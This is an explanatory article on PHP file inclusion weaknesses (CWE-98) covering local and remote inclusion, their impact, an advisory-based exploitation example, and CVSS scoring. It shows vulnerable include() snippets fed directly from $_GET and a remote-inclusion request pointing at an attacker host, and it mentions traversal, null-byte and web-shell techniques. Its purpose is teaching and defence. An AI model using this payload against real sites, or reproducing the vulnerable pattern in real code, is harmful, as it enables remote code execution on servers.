PHP File Inclusion [CWE-98] — The Hacktivists

PHP File Inclusion weakness describes improper control of filename within Include() or Require() statements in a PHP program.

Table of Content
1. Description
2. Potential impact
3. Attack patterns
4. Affected software
5. Exploitation Examples
6. Severity and CVSS Scoring

1. Description
………………………………

This weakness occurs when a PHP application receives input and uses it to include files via include(), require(), or similar functions. This results in the inclusion of attacker-controlled files, which might lead to information disclosure or execution of arbitrary code. There are two types of inclusion based on the location of the file to include. They are referred to as local and remote file inclusion.

❏ Local file inclusion: Local file inclusion occurs when an attacker is unable to control the first part of the filename or remote file download is disabled. The following example demonstrates a vulnerable PHP code that could be used to include local files:

$filename = $_GET["filename"];
Include($_SERVER["DOCUMENT_ROOT"]."/". $filename.".php");

In the above example, an attacker can pass a specially crafted filename and include an arbitrary file from the local system. Due to the nature of the PHP language, the contents of any plain text file will be displayed. This attack can be used to include and execute attacker-controlled PHP code, e.g., via web server log files and directory traversal sequences.

The attacker can use directory traversal sequences and NULL bytes to gain access to an arbitrary local file. When a NULL byte is filtered, the attacker might use the maximum path length limitations of different systems.

❏ Remote file inclusion: Remote file inclusion occurs when an attacker can control the first part of the filename or the entire filename. The following example demonstrates the vulnerability:

$dir = $_GET["path"];
include($dir . "/file.inc");

The value of the $dir variable is not restricted in any way, so an attacker can manipulate it. The following request includes the file.php file from a remote location:

vulnerable.php?path=http://attacker-site

Such a request will result in the execution of the file.inc file located on the attacker’s server.
Remote file inclusion depends on the allow_url_include and allow_url_fopen options in php.ini.

2. Potential impact
………………………………

Successful exploitation of PHP file inclusion may result in information disclosure or compromise of the vulnerable system. A remote attacker can read and write files or execute arbitrary code on the target system with the privileges of the webserver.

3. Attack patterns
………………………………

In the CAPEC database, this weakness is treated as:

❏ CAPEC-193: PHP Remote File Inclusion
❏ CAPEC-252: PHP Local File Inclusion

According to alternative threat classification from WASC, this weakness is partially covered in WASC-05 (Remote File Inclusion) and WASC-28 (Null Byte Injection).

4. Affected software
………………………………

Web applications written in PHP are potentially vulnerable to this weakness.

5. Exploitation Examples
………………………………

Let’s have a look at the HTB23084 security advisory (CVE-2012–1933).

This advisory describes remote file inclusion, which means that we must create a file with PHP code on an arbitrary server:

We will try to include this file, as described in the advisory, and see what happens:

In the image above, we can see the output of the phpinfo() function. We can replace it with any PHP code, including a web shell, and execute it on the vulnerable server. Successful exploitation of this vulnerability will result in a complete system compromise.

6. Severity and CVSS Scoring
……………………………………..

This weakness potentially allows unauthorized code execution on a remote system. It should be scored with maximum confidentiality, integrity, and availability ratings.

In cases where remote file inclusion is possible, the CVSS score should be:
9.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H] — Critical severity.

When local file inclusion is possible, a malicious user can include a local file with attacker-controlled data (e.g., web server log file). It should be scored as:
8.1 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H] — High severity.

In cases where the inclusion of attacker-controlled data is impossible, it should be scored as:
7.5 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N] — High severity.

Credits: https://www.immuniweb.com/